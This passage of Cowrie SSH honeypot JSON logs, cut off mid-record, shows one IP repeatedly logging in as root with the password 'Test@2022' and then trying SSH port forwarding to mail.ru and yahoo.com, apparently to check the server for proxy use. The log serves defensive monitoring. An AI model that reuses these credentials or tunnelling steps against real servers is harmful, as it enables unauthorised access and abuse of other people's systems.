{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":32151,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:32151","sensor":"my-vps","timestamp":"2025-08-31T03:48:45.491989Z","session":"a7757b62a090"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:45.541742Z","src_ip":"77.83.207.83","session":"a7757b62a090"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:45.592297Z","src_ip":"77.83.207.83","session":"a7757b62a090"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":5232,"dst_ip":"1.2.3.4","dst_port":22,"session":"df3f776f0d88","protocol":"ssh","message":"New connection: 77.83.207.83:5232 (1.2.3.4:22) [session: df3f776f0d88]","sensor":"my-vps","timestamp":"2025-08-31T03:48:45.642215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:45.652014Z","src_ip":"77.83.207.83","session":"df3f776f0d88"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:45.693277Z","src_ip":"77.83.207.83","session":"df3f776f0d88"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:45.944415Z","src_ip":"77.83.207.83","session":"df3f776f0d88"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41774,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8da4328bd7b","protocol":"ssh","message":"New connection: 212.227.235.229:41774 (1.2.3.4:22) [session: a8da4328bd7b]","sensor":"my-vps","timestamp":"2025-08-31T03:48:45.973023Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21242,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:21242","sensor":"my-vps","timestamp":"2025-08-31T03:48:45.996388Z","session":"df3f776f0d88"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:46.047603Z","src_ip":"77.83.207.83","session":"df3f776f0d88"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19102,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:19102","sensor":"my-vps","timestamp":"2025-08-31T03:48:46.192797Z","session":"df3f776f0d88"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:46.243263Z","src_ip":"77.83.207.83","session":"df3f776f0d88"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":3204,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:3204","sensor":"my-vps","timestamp":"2025-08-31T03:48:46.385209Z","session":"df3f776f0d88"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:46.436150Z","src_ip":"77.83.207.83","session":"df3f776f0d88"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:46.487605Z","src_ip":"77.83.207.83","session":"df3f776f0d88"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":5310,"dst_ip":"1.2.3.4","dst_port":22,"session":"22cac5456015","protocol":"ssh","message":"New connection: 77.83.207.83:5310 (1.2.3.4:22) [session: 22cac5456015]","sensor":"my-vps","timestamp":"2025-08-31T03:48:46.537080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:46.546773Z","src_ip":"77.83.207.83","session":"22cac5456015"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:46.588266Z","src_ip":"77.83.207.83","session":"22cac5456015"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:46.839315Z","src_ip":"77.83.207.83","session":"22cac5456015"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5145,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:5145","sensor":"my-vps","timestamp":"2025-08-31T03:48:46.891693Z","session":"22cac5456015"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:46.942067Z","src_ip":"77.83.207.83","session":"22cac5456015"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:48:47.061370Z","src_ip":"212.227.235.229","session":"a8da4328bd7b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:48:47.062134Z","src_ip":"212.227.235.229","session":"a8da4328bd7b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":1867,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:1867","sensor":"my-vps","timestamp":"2025-08-31T03:48:47.084380Z","session":"22cac5456015"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:47.134743Z","src_ip":"77.83.207.83","session":"22cac5456015"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":9003,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:9003","sensor":"my-vps","timestamp":"2025-08-31T03:48:47.276565Z","session":"22cac5456015"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:47.326782Z","src_ip":"77.83.207.83","session":"22cac5456015"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:47.378093Z","src_ip":"77.83.207.83","session":"22cac5456015"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":5403,"dst_ip":"1.2.3.4","dst_port":22,"session":"b20acb1fe62d","protocol":"ssh","message":"New connection: 77.83.207.83:5403 (1.2.3.4:22) [session: b20acb1fe62d]","sensor":"my-vps","timestamp":"2025-08-31T03:48:47.426539Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:47.436027Z","src_ip":"77.83.207.83","session":"b20acb1fe62d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:47.476470Z","src_ip":"77.83.207.83","session":"b20acb1fe62d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:47.724830Z","src_ip":"77.83.207.83","session":"b20acb1fe62d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21163,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:21163","sensor":"my-vps","timestamp":"2025-08-31T03:48:47.775504Z","session":"b20acb1fe62d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:47.825380Z","src_ip":"77.83.207.83","session":"b20acb1fe62d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26680,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:26680","sensor":"my-vps","timestamp":"2025-08-31T03:48:47.968152Z","session":"b20acb1fe62d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:48.017964Z","src_ip":"77.83.207.83","session":"b20acb1fe62d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":31042,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:31042","sensor":"my-vps","timestamp":"2025-08-31T03:48:48.160057Z","session":"b20acb1fe62d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:48.209895Z","src_ip":"77.83.207.83","session":"b20acb1fe62d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:48.260368Z","src_ip":"77.83.207.83","session":"b20acb1fe62d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":5484,"dst_ip":"1.2.3.4","dst_port":22,"session":"2775865202ae","protocol":"ssh","message":"New connection: 77.83.207.83:5484 (1.2.3.4:22) [session: 2775865202ae]","sensor":"my-vps","timestamp":"2025-08-31T03:48:48.310139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:48.311074Z","src_ip":"77.83.207.83","session":"2775865202ae"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:48.361180Z","src_ip":"77.83.207.83","session":"2775865202ae"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:48.611652Z","src_ip":"77.83.207.83","session":"2775865202ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4854,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:4854","sensor":"my-vps","timestamp":"2025-08-31T03:48:48.662991Z","session":"2775865202ae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:48.713530Z","src_ip":"77.83.207.83","session":"2775865202ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31143,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:31143","sensor":"my-vps","timestamp":"2025-08-31T03:48:48.856766Z","session":"2775865202ae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:48.906998Z","src_ip":"77.83.207.83","session":"2775865202ae"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":28871,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:28871","sensor":"my-vps","timestamp":"2025-08-31T03:48:49.048654Z","session":"2775865202ae"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:49.099073Z","src_ip":"77.83.207.83","session":"2775865202ae"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:49.150508Z","src_ip":"77.83.207.83","session":"2775865202ae"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":5569,"dst_ip":"1.2.3.4","dst_port":22,"session":"794546eddd9e","protocol":"ssh","message":"New connection: 77.83.207.83:5569 (1.2.3.4:22) [session: 794546eddd9e]","sensor":"my-vps","timestamp":"2025-08-31T03:48:49.198723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:49.199431Z","src_ip":"77.83.207.83","session":"794546eddd9e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-r